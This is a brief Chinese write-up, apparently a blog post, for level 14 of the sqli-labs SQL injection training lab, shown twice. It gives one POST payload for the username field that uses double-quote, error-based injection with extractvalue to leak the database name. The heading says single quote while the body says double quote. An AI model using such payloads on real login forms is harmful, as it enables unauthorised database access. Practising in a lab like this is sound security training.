Sqli labs less14
less14的考点是POST单引号变形双注入
1.测试
2.通过测试得知本less是双引号报错型注入,操作类似Less-13,可以通过布尔盲注和报错盲注,来进行解题
uname=1" and extractvalue(1,concat(0x7e,(select database()))) -- # &passwd=1
less14的考点是POST单引号变形双注入
1.测试
2.通过测试得知本less是双引号报错型注入,操作类似Less-13,可以通过布尔盲注和报错盲注,来进行解题
uname=1" and extractvalue(1,concat(0x7e,(select database()))) -- # &passwd=1
浙公网安备 33010602011771号